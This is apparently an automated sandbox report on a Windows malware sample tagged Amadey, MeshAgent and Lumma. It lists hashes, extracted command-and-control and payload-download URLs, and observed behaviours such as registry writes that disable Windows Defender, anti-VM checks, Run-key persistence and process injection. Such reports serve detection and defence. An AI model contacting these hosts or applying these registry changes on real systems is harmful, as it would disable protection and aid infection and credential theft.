Analysis
-
max time kernel
103s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 23:51
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
b19ff2ebc03f382529b2f8802b4bf39c
-
SHA1
a648b3cfccbf7200eb03ccc69b57573b899937ec
-
SHA256
6b45d4d0d453fff7c377439cd75cc088d684b95989e4ac65772757b9a3ce6f71
-
SHA512
84ff2567b6417a3490f1828c121a7f4db96145d66d3d6eecdfaaa42ec25105385581b7637ee4cee385b69bf8effc3e3688c2690e8f2092a81bc5cbb6e543b48b
-
SSDEEP
24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a0Du:YTvC/MTQYxsWR7a0D
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
meshagent
2
test123
http://aaso12.duckdns.org:443/agent.ashx
-
mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
-
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
-
wss
wss://aaso12.duckdns.org:443/agent.ashx
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://iplpepperiop.digital/oage
https://jrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2480-8990-0x0000000000220000-0x0000000000682000-memory.dmp healer behavioral1/memory/2480-8991-0x0000000000220000-0x0000000000682000-memory.dmp healer behavioral1/memory/2480-10383-0x0000000000220000-0x0000000000682000-memory.dmp healer -
Detects MeshAgent payload 1 IoCs
resource yara_rule behavioral1/files/0x00120000000240cd-2984.dat family_meshagent -
Healer family
-
Lumma family
-
Meshagent family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 26e3163963.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 26e3163963.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 26e3163963.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 26e3163963.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Contacts a large (7298) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3c45e50620.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ abd9625a86.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a8afec1b66.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 26e3163963.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ but2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9b14f9cb38.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 22 1484 powershell.exe 217 2832 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell and hide display window.
pid Process 1484 powershell.exe 1768 powershell.exe 6108 powershell.exe 2832 powershell.exe 12540 powershell.exe 5636 powershell.exe 1436 powershell.exe 2272 powershell.exe 2304 powershell.exe 6396 powershell.exe 1804 powershell.exe 2416 powershell.exe 7008 powershell.exe 6524 powershell.exe 2036 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 20 IoCs
flow pid Process 308 3816 futors.exe 385 5176 rapes.exe 385 5176 rapes.exe 385 5176 rapes.exe 385 5176 rapes.exe 385 5176 rapes.exe 385 5176 rapes.exe 36 5176 rapes.exe 217 2832 powershell.exe 28 5176 rapes.exe 44 5176 rapes.exe 44 5176 rapes.exe 44 5176 rapes.exe 44 5176 rapes.exe 1041 5176 rapes.exe 107 3816 futors.exe 107 3816 futors.exe 107 3816 futors.exe 22 1484 powershell.exe 71 3816 futors.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3032 takeown.exe 60 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 17 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3356 msedge.exe 37864 chrome.exe 5668 chrome.exe 2760 chrome.exe 1332 msedge.exe 6056 msedge.exe 1732 chrome.exe 36096 chrome.exe 4720 msedge.exe 37292 chrome.exe 2444 chrome.exe 4700 chrome.exe 548 msedge.exe 1924 msedge.exe 37216 chrome.exe 5448 msedge.exe 37280 chrome.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion but2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion but2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9b14f9cb38.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3c45e50620.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a8afec1b66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9b14f9cb38.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion abd9625a86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eb5f738682.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3c45e50620.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion abd9625a86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a8afec1b66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 26e3163963.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eb5f738682.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 26e3163963.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation 272.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation 272.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation Amadey.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation c8993dd17a.exe -
Executes dropped EXE 48 IoCs
pid Process 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 5176 rapes.exe 2508 7q8Wm5h.exe 4544 apple.exe 3696 272.exe 6116 272.exe 2404 amnew.exe 3816 futors.exe 5928 trOUuPI.exe 2160 MeshAgent.exe 4720 v7942.exe 1456 UU0LfLZ.exe 5316 IsValueCreated.exe 2688 alex12312321.exe 4224 futors.exe 1484 rapes.exe 4920 c48d7ad7ca.exe 1692 MeshAgent.exe 4988 TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE 2160 legendarik.exe 4232 9b14f9cb38.exe 5320 c8993dd17a.exe 2824 MeshAgent.exe 2304 3f2e1d5910.exe 1284 crypted.exe 5260 svchost015.exe 4608 3c45e50620.exe 6516 Amadey.exe 6844 tgvazx.exe 4536 svchost015.exe 6924 abd9625a86.exe 6980 a8afec1b66.exe 1392 MeshAgent.exe 6340 svchost015.exe 448 eb5f738682.exe 3220 Constraints.com 2180 svchost015.exe 4204 eb5f738682.exe 1864 92286f2337.exe 2480 26e3163963.exe 6808 Mbxp0H9.exe 5736 93Q6JeiQLY.exe 5924 br30yxxIPR.exe 2140 93Q6JeiQLY.exe 3336 but2.exe 5116 pcidrv.exe 2764 futors.exe 6940 rapes.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine a8afec1b66.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 26e3163963.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine but2.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 9b14f9cb38.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 3c45e50620.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine abd9625a86.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3032 takeown.exe 60 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 26e3163963.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 26e3163963.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a8afec1b66.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10453920101\\a8afec1b66.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb5f738682.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10051530101\\eb5f738682.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb5f738682.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10453930101\\eb5f738682.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92286f2337.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10453940101\\92286f2337.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26e3163963.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10453950101\\26e3163963.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\abd9625a86.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10051520101\\abd9625a86.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1084 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000242e9-3834.dat autoit_exe behavioral1/files/0x0008000000024223-8318.dat autoit_exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\msvcrt.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\System32\rpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\06305731656994F352A9BCF0D438F64545C0DA3D MeshAgent.exe File opened for modification C:\Windows\System32\rpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\System32\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\user32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\combase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\user32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb MeshAgent.exe File opened for modification C:\Windows\System32\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\System32\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\shcore.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3552 tasklist.exe 4292 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 5176 rapes.exe 1484 rapes.exe 4988 TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE 4232 9b14f9cb38.exe 4608 3c45e50620.exe 6924 abd9625a86.exe 6980 a8afec1b66.exe 2480 26e3163963.exe 3336 but2.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 5928 set thread context of 4464 5928 trOUuPI.exe 193 PID 4720 set thread context of 4492 4720 v7942.exe 201 PID 2688 set thread context of 740 2688 alex12312321.exe 219 PID 2160 set thread context of 5448 2160 legendarik.exe 235 PID 2304 set thread context of 5260 2304 3f2e1d5910.exe 261 PID 1284 set thread context of 3080 1284 crypted.exe 262 PID 4608 set thread context of 4536 4608 3c45e50620.exe 271 PID 6924 set thread context of 6340 6924 abd9625a86.exe 284 PID 5316 set thread context of 6772 5316 IsValueCreated.exe 291 PID 448 set thread context of 2180 448 eb5f738682.exe 294 PID 6808 set thread context of 3028 6808 Mbxp0H9.exe 338 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.exe s.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows 